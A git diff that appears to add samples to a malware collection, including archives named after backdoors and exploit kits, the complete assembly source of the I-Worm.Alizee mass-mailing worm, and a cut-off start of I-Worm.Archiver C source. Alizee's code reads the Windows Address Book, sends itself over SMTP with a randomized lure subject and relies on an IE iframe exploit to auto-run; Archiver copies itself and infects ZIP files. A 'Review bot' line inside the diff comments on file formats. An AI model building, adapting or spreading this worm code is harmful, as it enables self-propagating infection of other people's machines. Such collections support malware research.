diff --git a/Win32/Adrena.7z b/Win32/Adrena.7z
new file mode 100644
index 00000000..a7fd6926
Binary files /dev/null and b/Win32/Adrena.7z differ
diff --git a/Win32/Backdoor.Win32.Aryan.7z b/Win32/Backdoor.Win32.Aryan.7z
new file mode 100644
index 00000000..e54b3efe
Binary files /dev/null and b/Win32/Backdoor.Win32.Aryan.7z differ
diff --git a/Win32/ExploitKit.0x88.7z b/Win32/ExploitKit.0x88.7z
new file mode 100644
index 00000000..a47abef5
Binary files /dev/null and b/Win32/ExploitKit.0x88.7z differ
diff --git a/Win32/ExploitKit.Blackhole.A.7z b/Win32/ExploitKit.Blackhole.A.7z
new file mode 100644
index 00000000..a7c8fe1c
Binary files /dev/null and b/Win32/ExploitKit.Blackhole.A.7z differ
diff --git a/Win32/ExploitKit.Blackhole.B.7z b/Win32/ExploitKit.Blackhole.B.7z
new file mode 100644
index 00000000..f103b5aa
Binary files /dev/null and b/Win32/ExploitKit.Blackhole.B.7z differ
diff --git a/Win32/ExploitKit.BleedingLife.B.7z b/Win32/ExploitKit.BleedingLife.B.7z
new file mode 100644
index 00000000..fe56f864
Binary files /dev/null and b/Win32/ExploitKit.BleedingLife.B.7z differ
diff --git a/Win32/ExploitKit.CrimePack.3.1.3.7z b/Win32/ExploitKit.CrimePack.3.1.3.7z
new file mode 100644
index 00000000..c0dca486
Binary files /dev/null and b/Win32/ExploitKit.CrimePack.3.1.3.7z differ
diff --git a/Win32/ExploitKit.DemonHunter.7z b/Win32/ExploitKit.DemonHunter.7z
new file mode 100644
index 00000000..4e9484d1
Binary files /dev/null and b/Win32/ExploitKit.DemonHunter.7z differ
diff --git a/Win32/ExploitKit.Eleonore.1.4.4.7z b/Win32/ExploitKit.Eleonore.1.4.4.7z
new file mode 100644
index 00000000..96675d9f
Binary files /dev/null and b/Win32/ExploitKit.Eleonore.1.4.4.7z differ
diff --git a/Win32/I-Worm.Alizee.asm b/Win32/I-Worm.Alizee.asm
new file mode 100644
index 00000000..6f4757df
--- /dev/null
+++ b/Win32/I-Worm.Alizee.asm
@@ -0,0 +1,1232 @@ +comment $ + +ey, this comment is added 21 november 2001. i saw that aliz is spreading +pretty, so just some more about-text then the original release (i thought it +would be a worm that nobody would ever know :). + +well, i wrote this worm long ago, in about two days, just cause i was bored. +it was around the time that the iframe sploit was 1-day old, thats all i re- +member and i have no clue how long ago that was. + +anyway, i wanted to code a small worm. i did it, but what then? i didn't wanna +drop it itw cause massmailers are lame. (the total worm is lame, really). +so i decided that it would be nice for coderz #2... that was going to be +released around that days (heheheheeheh a half year later now i write this +text and it still getting released soon). anyway, thats why that text is in +it. i had to fill much space, so thats why that huge stupid text. + +anyway, coderz#2 wasn't getting released for weeks, months, etc, so i decided +to fork the AV's a sample, and i uploaded it to my site, as a binary, in a +zip file with a secret password, as a test sample. + +nothing happens and i forgot the total fuck worm. although avx wrote a +description very fast because they are lame. + +well, 19 november i was just checking f-secure.com, because they have nice +a special section pictures of viruses (payloads) in their description part, +and what did i see: aliz. in the wild... + +woowwie ;) + +now it is high risk blabla on many av sites... + +well, its a lame worm, and i didn't care really cause nobody would really +see it (look over the source). anyway, now it differs a lil i guess ;) + +heh. + +greetings + +mar00n (a lame nick too) + + +description, today i pick f-secure because its the most complimentous desc. ;) + +btw, 'in pure Assembly', did they recognize it or was it because of my text +in the body?: '..power in pure win32asm..' 
hehe ;)) + +------------------------------------------------------------------------------ +Aliz is a very small e-mail worm written in pure Assembly. It appeared in the +wild on 18-20th of November 2001. The worm's file is only 4 kilobytes long +and its code is compressed. It can be considered one of the smallest Win32 +worms ever created. + +When the worm is run, it first unpacks itself and then passes control to API +address setup routine. When all needed API addresses are collected, the +control is passed to the main worm's code. The worm checks the Registry for +the location of Windows Address Book file and loads it into memory. The worm +then connects to default SMTP server (for SMTP server info the worm checks +Internet Accound Manager data in the Registry) and sends itself to all +recepients of Windows Address Book. The infected message looks like that: + + + + Subject: + Body: + Attachment: Whatever.exe + +The subject of infected message is randomly composed from 5 different parts: + + + + Fw: + Fw: Re: + + + + Cool + Nice + Hot + some + Funny + weird + funky + great + Interesting + many + + + + website + site + pics + urls + pictures + stuff + mp3s + shit + music + info + + + + to check + for you + i found + to see + here + - check it + + + + !! + ! + :-) + ?! + hehe ;-) + +For example a subject can be: "Fw: Cool pictures i found !!" or +"Nice website to check hehe ;-)". + +The message contains a MIME-encoded attachment - the worm's file with +'Whatever.exe' name. The body is an empty multi-part MIME message with HTML +formatting and i-frame trick that was previously found in Nimda and Klez +worms. Because of this trick on some systems the worm is able to self-launch +itself when an infected e-mail is viewed (for example, with Outlook and +IE 5.0 or 5.01). To do this the worm uses a known vulnerability in IE that +allows execution of an email attachment. 
This vulnerability is fixed and a +patch for it is available on Microsoft site: + +http://www.microsoft.com/windows/ie/downloads/critical/q290108/default.asp + +The worm doesn't install itself to system, it runs, sends itself out and +terminates its process. + +The worm contains the following text strings that are never displayed: + + + + :::iworm.alizee.by.mar00n!ikx2oo1::: + + + + while typing this text i realize this text got added on many av + description sites, because this silly worm could be easily a + hype. i wonder which av claims '[companyname] stopped high risk + worm before it could escape!' or shit like that. heh, or they + boycot my virus because of this text. well, it is easy enough + for the poor av's to add this worm; since it was only released + as source in coderz#2... btw, loveletter*2 power in pure win32asm + and only a 4k exe file. heh, vbs kiddies, phear win32asm. :) + thx to: bumblebee!29a, asmodeus!ikx. greets to: starzer0!ikx, + t-2000!ir, ultras!mtx & sweet gigabyte... + btw,burgemeester van sneek: ik zoek nog een baantje... + (alignmentfillingtext) + +F-Secure Anti-Virus detects Aliz worm with the latest updates. + +[Analysis: Alexey Podrezov; F-Secure Corp.; November 19th, 2001] + +------------------------------------------------------------------------------ + + +well and here the old comment + +$ + +comment $ + +iworm alizee by mar00n ! ikx 2oo1 + +alizee is a worm that mails itself around to all addies in your addressbook. + +not very special, is it? 
+ +well: + + 1-it shows that the stack is your best friend + 2-the generated exe file is only 4096 bytes + 3-it shows a clean compatible way in win32asm to obtain email addies + 4-the subject is random generated + 5-the attached exe file gets automatically executed if the reader + tries to read the message + 6-the whole thing is very clean written (who cares) + +indeed, very standard, except step 2 and 5 ;) + +more about them: + +step 2: yes, its very small, the code is compressed using aplib, and + decompressed using my own tweaked optmized aplib decompressor + +step 5: indeed, this means loveletter power*10. (code? search for tag) + + +succesfully tested under win98 & win2k... its nice to talk with your creation +using netcat ;) + +220 hi +helo localhost +250 ey man ;) wassup? do you have mail to send? +mail from: some@one.com +250 and to who? +rcpt to: sucker@microsoft.com +250 seems ok to me +data +354 go ahead ;) ... but don't forget the cr.cr, ok? + +blablablla + +well erh, this worm is very hard to compile, see my zip file for the bat files +and external programs you need. + + +thx: bumblebee for your base64 routines + asmodeus for the first one doing this + +grtz/fear: starzer0,billy,lifewire,vecna,z0mbie,t2k,benny,ratter,griyo + and gig + +ps, i don't love alizee or what. she's just ... highly fuckable? 
+ +$ +.386p +.model flat +locals __ + +include c:\tasm\inc\myinc.inc + +sizer equ 4098 + +binsize equ sizer + 3-(3-(sizer mod 3)) ;stupid 3-alignment for base64 + + +_call macro api + call dword ptr [api] + endm + +maxspread equ 666 ;max mail to n addies + +include c:\tasm\inc\win32api.inc ;luv to jackyqwerty +include c:\tasm\inc\useful.inc +include c:\tasm\inc\winsock.inc + +;extrn LoadLibraryA:proc; +;extrn GetProcAddress:proc; + +;----------------------------------------------------------------------------; +_CODE segment dword use32 public 'CODE' +start: nop ;heh + +_CODE ends +;----------------------------------------------------------------------------; + +.data ;only to use virtual offset 402000 +; int 3 + + call overseh + + jmp $ ;if seh we simply hang. why not? :) + + overseh: + xor edx,edx + push dword ptr fs:[edx] + mov fs:[edx],esp + +;----------------------------------------------------------------------------; + ;ebx=module base/handle + ;esi=crc32s + ;edi=wheretostore + + mov esi,offset apicrcs + mov edi,offset apis + + call __x + db "KERNEL32",0 + __x: + +i_importall_loop: +; call LoadLibraryA + call dword ptr [start+2034h] ;loadlibrary + xchg eax,ebx + call i_importapis ;first import k32 + xor eax,eax + lodsb + xchg eax,ecx + jecxz i_importall_done ;modulenamelength + push esi + add esi,ecx + jmp i_importall_loop +;----------------------------------------------------------------------------; + +i_importall_done: + + sub esp,size stackframe + + sub esp,size stack2 + mov ebp,esp + +; int 3 + + call __y + db "Software\Microsoft\WAB\WAB4\Wab File Name",0 + __y: + push 0 + call readregkey + + lea esi,[ebp.buffer] + + add esp,size stack2 + or eax,eax + jnz exit + + ;esp = filename of wab we choose + + mov ebp,esp + + call openfile + jc exit + + ;esi = wabmapview (nice name;) + + ;int 3 + + mov ecx,[esi+64h] ;number of adds + jecxz exit ;victim has no friends + add esi,[esi+60h] ;pointer addies + +; dec ecx + +; cmp ecx,maxspread +; jbe mailaround +; push 
maxspread +; pop ecx + + ;parse wab file for addies & mail the fun + +mailaround: + push ecx + + mov eax,esi + cmp byte ptr [esi+1],0 + jne nounicode + + + push esi ;unicode support + lea edi,[ebp.addie] + push edi + + push 48h + pop ecx +__y: + lodsw + stosb + loop __y + + pop eax ;ebp+addie + pop esi ;esi in wab.addresses + add esi,20h + +nounicode: +; int 3 + push ebp + call share ;share the fun + pop ebp + + add esi,24h + + pop ecx + loop mailaround + + push [ebp.createhandle] ;close wabfilehandle + push [ebp.maphandle] + push [ebp.viewhandle] + _call CloseHandle + _call CloseHandle + _call CloseHandle + +exit: add esp,size stackframe + + pop dword ptr fs:[0] + pop eax + + push 0 + _call ExitProcess + +db ":::iworm.alizee.by.mar00n!ikx2oo1:::",0dh,0dh + +db "while typing this text i realize this text got added on many av",0dh +db "description sites, because this silly worm could be easily a",0dh +db "hype. i wonder which av claims '[companyname] stopped high risk",0dh +db "worm before it could escape!' or shit like that. heh, or they",0dh +db "boycot my virus because of this text. well, it is easy enough",0dh +db "for the poor av's to add this worm; since it was only released",0dh +db "as source in coderz#2... btw, loveletter*2 power in pure win32asm",0dh +db "and only a 4k exe file. heh, vbs kiddies, phear win32asm. :)",0dh +db "thx to: bumblebee!29a, asmodeus!ikx. 
greets to: starzer0!ikx,",0dh +db "t-2000!ir, ultras!mtx & sweet gigabyte...",0dh +db "btw,burgemeester van sneek: ik zoek nog een baantje...",0dh +db "(alignmentfillingtext)",0dh + + +;----------------------------------------------------------------------------; + +share: push esi + mov esi,eax + + sub esp,size stack2 ;some workspace + mov ebp,esp + + push ebp + push 101h + _call WSAStartup ;startup wsock services + + push 0 + push 1 + push 2 + _call socket ;create socket + xchg eax,edi + + push 25 ;convert port to big/ + _call htons ;lil endian + + mov word ptr [ebp.sockaddr_in \ + .sin_family],AF_INET ;setup connect info + mov [ebp.sockaddr_in.sin_port],ax + + push offset szRegAccountInfo + call __porn + db "SMTP Server",0 + __porn: + call readregkey + jc share_xit + + ;ebx = smtp server name from registry + + push ebx + _call gethostbyname ;resolve + + or eax,eax + jz share_xit + + mov eax,[eax+12] ;no clue what i'm + mov eax,[eax] ;doing here. ctrl+c/v + mov eax,[eax] ;from my other source + ;but i hope eax=IP ;) + + mov dword ptr [ebp.sockaddr_in.sin_addr],eax + + push size ssockaddr_in + lea eax,[ebp.sockaddr_in] + push eax + push edi ;handle + _call connect + or eax,eax + jnz share_xit + + ;int 3 + + mov ebx,offset maildata + call sendstrings ;mail ourself + +clean_xit: + push edi + _call closesocket + _call WSACleanup ;disconnect + +share_xit: + add esp,size stack2 + pop esi + ret + +;----------------------------------------------------------------------------; + + +sendstrings: + xchg ebx,esi ;ebx is now dest. email. add. 
esi=data + ;and edi is socket handle + +parsemaildata: xor eax,eax + lodsb + cmp al,8 + ja nsend + or al,al + jz parsemaildata + + jmp [fntable-4+eax*4] + + + +nsend: dec esi + call stringsend + jmp parsemaildata + + + + +fntable dd offset checkmailinput + dd offset sendmailfrom + dd offset sendmailto + dd offset senddate + dd offset sendsubject + dd offset sendbase64 + dd offset exitexit + +sendbase64: ;int 3 + + pushad + + push binsize*4 ;oursize*2+base64space + push 0 + _call GlobalAlloc + push eax ;one push for globalfree + push eax ;one push for base64 fun + + xchg eax,edi + + push 0 + _call GetModuleHandleA + + xchg eax,esi + + xor ecx,ecx + +; mov ecx,200h/4 + mov ch,2 + rep movsb ;200h bytes + + add esi,(1000h-200h) + +; mov ecx,0a00h/4 + mov ch,0ah + rep movsb ;a00h bytes + + add esi,(2000h-0a00h) + +; mov ecx,400h/4 + mov ch,2 + rep movsb ;200h + + add esi,(1000h-400h) + +; mov ecx,200h/4 + mov ch,2 + rep movsb ;200h + + + pop eax ;src + lea edx,[eax+binsize+100h] ;dest + push edx + mov ecx,binsize ;in + + call encodebase64 + mov dword ptr [edx],0a0d3dh ; '=/cr/lf/z' + pop esi + mov edi,[esp.Pushad_edi+4] ;jqwerty forever :) + call stringsend + + _call GlobalFree + + popad + + jmp parsemaildata + +;----------------------------------------------------------------------------; +checkmailinput: push 0 + push 300h + lea eax,[ebp.buffer] + push eax + push edi ;handle + _call recv + + lodsw + cmp word ptr [ebp.buffer],ax ;codes match? + je parsemaildata + ret ;no good code -return to clean_xit +;----------------------------------------------------------------------------; + +;----------------------------------------------------------------------------; +sendmailfrom: push esi + + +; call __a +;fromwho db "test@localhost",0 +; __a: +; pop esi + + push ebx + + push offset szRegAccountInfo + call __s + db "SMTP Email Address",0 + __s: + call readregkey + mov esi,ebx + pop ebx + call stringsend ;well guess. test! 
:) + + pop esi +smfx: jmp parsemaildata +;----------------------------------------------------------------------------; + +;----------------------------------------------------------------------------; +sendmailto: push esi + mov esi,ebx + call stringsend + pop esi +smtx: jmp smfx +;----------------------------------------------------------------------------; + +;----------------------------------------------------------------------------; +senddate: pushad + ;int 3 + + push edi + lea edi,[ebp.buffer] + push edi + + push 100 + push edi + call __x +formdate db "ddd,dd MMM yyyy",0 + __x: + push 0 + push 0 + push 409h + _call GetDateFormatA + add edi,eax + dec edi + mov al,' ' + stosb + + push 100 + push edi + call __y +formtime db "HH:mm:ss",0 + __y: + push 0 + push 0 + push 409h + _call GetTimeFormatA + add edi,eax + dec edi + mov eax,'00- ' + stosd + mov eax,03030h + stosd ;barf + + pop esi + pop edi + call stringsend + + popad + +gsxx: jmp smtx +;----------------------------------------------------------------------------; + +;----------------------------------------------------------------------------; +exitexit: ;int 3 + ret +;----------------------------------------------------------------------------; + + +;----------------------------------------------------------------------------; +sendsubject: pushad + ;int 3 + + mov esi,offset gendata + push edi + lea edi,[ebp.buffer] + push edi + +hehe: + xor eax,eax + lodsb + + cmp al,31 + je done + + call get_rnd_range + xchg eax,ecx + +__l: or ecx,ecx + jz __b +__f: lodsb + or al,al + jnz __f + loop __l + +__b: lodsb + cmp al,0 + je __d + stosb + jmp __b +__d: mov al,' ' + stosb + +__g: lodsb + cmp al,0 + je __g + cmp al,' ' + jae __g + dec esi + jmp hehe + +done: + mov al,0 + stosb + pop esi + pop edi + call stringsend + popad + jmp gsxx + +gendata db 5 + db 0 + db 0 + db 0 + db "Fw:",0 + db "Fw: Re:",0 + + db 11 + db 0 + db "Cool",0 + db "Nice",0 + db "Hot",0 + db "some",0 + db "Funny",0 + db "weird",0 + db 
"funky",0 + db "great",0 + db "Interesting",0 + db "many",0 + + db 10 + db "website",0 + db "site",0 + db "pics",0 + db "urls",0 + db "pictures",0 + db "stuff",0 + db "mp3s",0 + db "shit",0 + db "music",0 + db "info",0 + + db 7 + db "to check",0 + db "for you",0 + db "i found",0 + db "to see",0 + db "here",0 + db "- check it",0 + db 0 + + db 6 + db "!!",0 + db "!",0 + db ":-)",0 ;lets use lame cool-to-newbies smileys ;P + db "?!",0 + db "hehe ;-)",0 + db 0 + + db 31 ;terminator + + +;----------------------------------------------------------------------------; + +;----------------------------------------------------------------------------; +stringsend: push esi + + xor ecx,ecx + dec ecx + +__x: lodsb + inc ecx + cmp al,8 + ja __x + + pop esi + push ecx + + push 0 ;flags + push ecx ;length + push esi ;datastart + push edi ;handle + _call send + + pop ecx + +; push 10 +; _call Sleep + + add esi,ecx + ret +;----------------------------------------------------------------------------; + +get_rnd_range: push ecx ;luv to griyo + push edx + mov ecx,eax + call get_rnd32 + xor edx,edx + div ecx + mov eax,edx + pop edx + pop ecx + ret + + +get_rnd32: ;Stolen from prizzy's Crypto + push ebx ecx edx + mov eax,dword ptr [ebp.rnd32seed] + mov ecx,41C64E6Dh + mul ecx + xchg eax,ecx + _call GetTickCount + mov ebx,eax + db 0Fh, 31h ;RDTCS instruction - read + xor eax,ebx + xchg ecx,eax ;PCs ticks to EDX:EAX + mul ecx + add eax,00003039h + mov dword ptr [ebp.rnd32seed],eax + pop edx ecx ebx + ret + +;----------------------------------------------------------------------------; + +encodebase64: ; encodeBase64 by Bumblebee. 
All rights reserved ;) +; input: +; EAX = Address of data to encode +; EDX = Address to put encoded data +; ECX = Size of data to encode +; output: +; ECX = size of encoded data +; + xor esi,esi + call over_enc_table + db "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + db "abcdefghijklmnopqrstuvwxyz" + db "0123456789+/" +over_enc_table: + pop edi + push ebp + xor ebp,ebp +baseLoop: + movzx ebx,byte ptr [eax] + shr bl,2 + and bl,00111111b + mov bh,byte ptr [edi+ebx] + mov byte ptr [edx+esi],bh + inc esi + + mov bx,word ptr [eax] + xchg bl,bh + shr bx,4 + mov bh,0 + and bl,00111111b + mov bh,byte ptr [edi+ebx] + mov byte ptr [edx+esi],bh + inc esi + + inc eax + mov bx,word ptr [eax] + xchg bl,bh + shr bx,6 + xor bh,bh + and bl,00111111b + mov bh,byte ptr [edi+ebx] + mov byte ptr [edx+esi],bh + inc esi + + inc eax + xor ebx,ebx + movzx ebx,byte ptr [eax] + and bl,00111111b + mov bh,byte ptr [edi+ebx] + mov byte ptr [edx+esi],bh + inc esi + inc eax + + inc ebp + cmp ebp,24 + jna DontAddEndOfLine + + xor ebp,ebp ; add a new line + mov word ptr [edx+esi],0A0Dh + inc esi + inc esi + test al,00h ; Optimized (overlap rlz!) + org $-1 +DontAddEndOfLine: + inc ebp + sub ecx,3 + or ecx,ecx + jne baseLoop + + mov ecx,esi + add edx,esi + pop ebp + ret +;----------------------------------------------------------------------------; + +;----------------------------------------------------------------------------; +readregkey: + lea eax,[ebp.regkeyhnd] + push eax + push dword ptr [esp+3*4] + push 80000001h ;hkey current user + _call RegCreateKeyA + or eax,eax + jnz rrke + +more_data: push 127 + push esp + lea ebx,[ebp.buffer] + push ebx + push 0 + push 0 + push dword ptr [esp+18h] + push [ebp.regkeyhnd] + _call RegQueryValueExA ;read stmp server + pop ecx + cmp eax,234 + je more_data ;?? 
+ or eax,eax + jnz rrke + + push [ebp.regkeyhnd] + _call RegCloseKey + clc + ret 8 + +rrke: stc + ret 8 +;----------------------------------------------------------------------------; + +;----------------------------------------------------------------------------; +openfile: xor ebx,ebx + push ebx + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push ebx + push ebx + push GENERIC_READ or GENERIC_WRITE + push esi + _call CreateFileA + inc eax + jz foerroropening + dec eax + mov dword ptr [ebp.createhandle],eax + + push ebx + push ebx ;max size low + push ebx + push PAGE_READWRITE + push ebx + push eax ;handle + _call CreateFileMappingA + mov dword ptr [ebp.maphandle],eax + + push ebx + push ebx + push ebx + push FILE_MAP_WRITE + push eax ;handle + _call MapViewOfFile + mov dword ptr [ebp.viewhandle],eax + xchg eax,esi + clc + ret +foerroropening: stc + ret +;----------------------------------------------------------------------------; + + ; ebx=module base/handle + ; edi=where to store + ; esi=crc32 stuff +i_importapis: + mov eax,[ebx+03ch] ;pointer to PE + mov edx,[eax+ebx+78h] ;export section + add edx,ebx + +i_ia_nextone: + lodsd + or eax,eax + jz i_ia_done + push esi + xchg eax,ecx ;ecx=desired crc32 + + mov esi,[edx+8*4] ;addresses of ApiNames + add esi,ebx +i_ia_find: + lodsd ;address + push esi + add eax,ebx ;add base + push eax ;save base for later + xchg eax,esi + call v_crc32 + cmp eax,ecx ;actual crc32=desired? + pop eax + pop esi + jne i_ia_find ;nope.. then next + + push edx ;preserve edx + + push eax ;eax=name + push ebx +; call GetProcAddress + call dword ptr [start+2038h] + + pop edx + + stosd + + pop esi + jmp i_ia_nextone +i_ia_done: + ret + +v_crc32: ;ofcourse i stole this... :) + push edx + mov edx,09C3B248Eh + __gCRC32_next_byte: + lodsb + or al,al ;end of name ? 
+ jz __gCRC32_finish + + xor dl,al + mov al,08h + __gCRC32_next_bit: + shr edx,01h + jnc __gCRC32_no_change + xor edx,0C1A7F39Ah + __gCRC32_no_change: + dec al + jnz __gCRC32_next_bit + jmp __gCRC32_next_byte + __gCRC32_finish: + xchg eax,edx ;CRC32 to EAX + pop edx + ret + + + + +szRegAccountInfo db "Software\Microsoft\Internet Account Manager\Accounts\00000001",0 + +mCheck equ 1 ;recv/checkfor +mFromAd equ 2 ;mailfrom addy +mDestAd equ 3 ;sendto addy +mTime equ 4 ;right time/date field +mSubj equ 5 ;random generated subject +mBase64 equ 6 ;base64 data +mEom equ 7 ;endofmail + + +;----------------------------------------------------------------------------; +; *** the email data *** ; + + +; smtp commands +;----------------------------------------------------------------------------; + +crlf equ 0dh,0ah +crlfz equ crlf,0 +maildata db mCheck,'22' ;--check 220 greet + db 'HELO localhost',crlf ;HELO localhost + db mCheck,'25' ;--check 250 + db 'MAIL FROM: ',mFromAd,crlf ;MAIL FROM: addie + db mCheck,'25' ;--check 250 + db 'RCPT TO: ',mDestAd,crlf ;RCPT TO: addie + db mCheck,'25' ;--check 250 + db 'DATA',crlf ;DATA + db mCheck,'35' ;--check 354 + +; stupid default stuph +;----------------------------------------------------------------------------; + +db 'From: ',mFromAd,crlf +db 'To: ',mDestAd,crlf +db 'Subject: ',mSubj,crlf +db 'Date: ',mTime,crlf + + ;mime headers +;----------------------------------------------------------------------------; + +db 'MIME-Version: 1.0',crlf +db 'Content-Type: multipart/mixed;',crlf +db ' boundary="bound"',crlf +db ' X-Priority: 3',crlf +db ' X-MSMail-Priority: Normal',crlf +db ' X-Mailer: Microsoft Outlook Express 5.50.4522.1300',crlf +db ' X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1300',crlf +db crlf +db 'This is a multi-part message in MIME format.',crlf +db crlf + + ;first part: html code to run the sploit +;----------------------------------------------------------------------------; + +db '--bound',crlf +db 
'Content-Type: text/html;',crlf +db ' charset="iso-8859-1"',crlf +db 'Content-Transfer-Encoding: quoted-printable',crlf +db crlf +db '',crlf +db 'peace',crlf +db crlf + + ;next part - the sploit +;----------------------------------------------------------------------------; + +db '--bound',crlf +db 'Content-Type: audio/x-wav;',crlf +db ' name="whatever.exe"',crlf +db 'Content-Transfer-Encoding: base64',crlf +db 'Content-ID: ',crlf +db crlf + + ;base64 stuff +;----------------------------------------------------------------------------; +db mBase64 + + ;end boundary & quit command +;----------------------------------------------------------------------------; + +db crlf,'--bound--',crlf,'.',crlf +db 'QUIT',crlf,mEom + +;----------------------------------------------------------------------------; + +apicrcs: +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m + dd 0 + + db 9 + db "ADVAPI32",0 +crc32m +crc32m +crc32m +dd 0 + + db 8 + db "WSOCK32",0 +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m +crc32m + dd 0 + db 0 + + +db "END" + +apis: + +GetWindowsDirectoryA dd ? +CloseHandle dd ? +ExitProcess dd ? +GlobalAlloc dd ? +GetModuleHandleA dd ? +GlobalFree dd ? +GetDateFormatA dd ? +GetTimeFormatA dd ? +Sleep dd ? +GetTickCount dd ? +CreateFileA dd ? +CreateFileMappingA dd ? +MapViewOfFile dd ? + + +RegCreateKeyA dd ? + +RegQueryValueExA dd ? +RegCloseKey dd ? + + +WSAStartup dd ? +socket dd ? +htons dd ? +gethostbyname dd ? +connect dd ? +closesocket dd ? +recv dd ? +send dd ? +WSACleanup dd ? + + + +totalend: + +stackframe struc + +createhandle dd ? +maphandle dd ? +viewhandle dd ? +addie db 48h dup (?) + +stackframe ends + + + +stack2 struc + +regkeyhnd dd ? +sockaddr_in ssockaddr_in ? +buffer db 300h dup (?) +rnd32seed dd ? +;space WSADATA ? +ends + + end start + end + + diff --git a/Win32/I-Worm.Archiver.c b/Win32/I-Worm.Archiver.c new file mode 100644 index 00000000..cf4568b8 --- /dev/null 
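Review bot: I-Worm.Alizee.asm is committed as plaintext, buildable source while every other sample in this commit (Adrena.7z through ExploitKit.Eleonore.1.4.4.7z) is committed as a .7z archive; the I-Worm.Archiver.c and I-Worm.BigBrother.asm hunks that follow have the same inconsistency. Storing these three files in the same archive form as the rest would keep the Win32/ directory uniform and, presumably, stop on-access scanners from quarantining or altering files in a plain checkout. The file's own header text already records that the iframe technique it relies on was patched (q290108 in the quoted description), so no change to the source itself is being proposed.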
+++ b/Win32/I-Worm.Archiver.c 
@@ -0,0 +1,227 @@ +/* +Name : I-Worm.Archiver +Author : PetiK +Date : Mai 10th 2002 - +Language : C++ + +Comments : Infect ZIP files which run with WINZIP. + + We can also to do the same think with PowerArchiver: + powerarc -a -c4 archive.zip virus.exe + +*/ + +#include +#include +#include + +#pragma argused +#pragma inline + + +char filen[100],copyn[100],copyreg[100],windir[100],sysdir[100],inzip[256],fsubj[50]; +char *fnam[]={"news","support","info","newsletter","webmaster"}; +char *fmel[]={"@yahoo.com","@hotmail.com","@symantec.com","@microsoft.com","@avp.ch","@viruslist.com"}; +LPSTR run="Software\\Microsoft\\Windows\\CurrentVersion\\Run", + SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders"; +char attname[]="news_xxxxxxxx.exe"; +LPTSTR cmdLine,ptr; +BOOL installed; +BYTE desktop[50],favoris[50],personal[50],winzip[50]; +DWORD sizdesktop=sizeof(desktop),sizfavoris=sizeof(favoris), + sizpersonal=sizeof(personal),sizwinzip=sizeof(winzip); +DWORD type=REG_SZ; +long i; + +LHANDLE session; +MapiMessage *mes; +MapiRecipDesc from; +char messId[512],mname[50],maddr[30]; +HINSTANCE hMAPI; + +HKEY hReg; +WIN32_FIND_DATA ffile; + +void infzip(char *); + +ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG); +ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG); +ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE); +ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR); +ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *); +ULONG (PASCAL FAR *mFreeBuffer)(LPVOID); + +int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow) +{ + +GetModuleFileName(hInst,filen,100); +GetSystemDirectory((char *)sysdir,100); +GetWindowsDirectory((char *)copyn,100); +strcpy(windir,copyn); +strcat(copyn,"\\Archiver.exe"); + +installed=FALSE; +cmdLine=GetCommandLine(); +if(cmdLine) { + for(ptr=cmdLine;ptr[0]!='-' && 
ptr[1]!=0;ptr++); + if(ptr[0]=='-' && ptr[1]!=0) { + switch(ptr[1]) { + default: + break; + case 'i': + installed=TRUE; + break; + case 'p': + ShellAbout(0,"I-Worm.Archiver","Copyright (c)2002 - PetiKVX",0); + MessageBox(NULL,"This new Worm was coded by PetiK.\nFrance - (c)2002", + "I-Worm.Archiver",MB_OK|MB_ICONINFORMATION); + ExitProcess(0); + break; + } + } + } + +if(!installed) { +CopyFile(filen,copyn,FALSE); +strcpy(copyreg,copyn); +strcat(copyreg," -i"); +/* RegOpenKeyEx(HKEY_LOCAL_MACHINE,run,0,KEY_WRITE,&hReg); +RegSetValueEx(hReg,"Archiver",0,REG_SZ,(BYTE *)copyreg,100); +RegCloseKey(hReg); */ +ExitProcess(0); +} + +RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg); +RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop); +RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris); +RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal); +RegCloseKey(hReg); +RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hReg); +RegQueryValueEx(hReg,NULL,0,&type,winzip,&sizwinzip); +RegCloseKey(hReg); + +if(strlen(winzip)!=0) { +infzip(windir); +infzip(sysdir); +infzip(desktop); +infzip(personal); +infzip(favoris); +infzip("C:\\"); +} + +/* +_asm +{ +call @wininet +db "WININET.DLL",0 +@wininet: +call LoadLibrary +test eax,eax +jz end_asm +mov ebp,eax +call @inetconnect +db "InternetGetConnectedState",0 +@inetconnect: +push ebp +call GetProcAddress +test eax,eax +jz end_wininet +mov edi,eax +verf: +push 0 +push Tmp +call edi +dec eax +jnz verf + +end_wininet: +push ebp +call FreeLibrary +end_asm: +jmp end_all_asm + +Tmp dd 0 + +end_all_asm: +} + + +hMAPI=LoadLibrary("MAPI32.DLL"); +(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail"); +(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon"); +(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff"); +(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext"); +(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail"); 
